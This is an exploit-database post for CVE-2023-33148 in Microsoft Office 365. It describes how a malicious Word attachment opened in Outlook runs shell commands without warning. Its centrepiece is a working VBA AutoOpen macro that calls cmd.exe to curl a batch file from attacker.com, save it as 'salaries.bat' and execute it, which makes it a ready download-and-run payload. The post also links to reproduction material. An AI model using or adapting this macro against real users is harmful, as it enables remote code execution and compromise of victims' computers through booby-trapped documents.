Microsoft Office 365 18.2305.1222.0 Remote Code Execution

`## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of  
Privilege Vulnerability + RCE.  
## Author: nu11secur1ty  
## Date: 07.18.2023  
## Vendor: https://www.microsoft.com/  
## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office  
## Reference: https://portswigger.net/web-security/access-control  
## CVE-2023-33148  
  
  
## Description:  
The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to  
Elevation of Privilege.  
The attacker can use this vulnerability to attach a very malicious  
WORD file in the Outlook app which is a part of Microsoft Office 365  
and easily can trick the victim to click on it - opening it and  
executing a very dangerous shell command, in the background of the  
local PC. This execution is without downloading this malicious file,  
and this is a potential problem and a very dangerous case! This can be  
the end of the victim's PC, it depends on the scenario.  
WARNING! Office 365 executes files directly from Outlook, without temp  
downloading, security checking and etc.  
  
  
## Staus: HIGH Vulnerability  
  
[+]Exploit:  
  
- - - NOTE:  
This exploit is connected to the third-party server, and when the  
victim clicks on it and opens it the content of the script which is  
inside will fetch on the machine locally and execute himself by using  
MS Office 365 and Outlook app which is a part of the 365 API.  
  
```vb  
Sub AutoOpen()  
Call Shell("cmd.exe /S /c" & "curl -s  
https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat  
&& .\salaries.bat", vbNormalFocus)  
End Sub  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)  
  
## Proof and Exploit  
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)  
  
## Time spend:  
00:35:00  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
`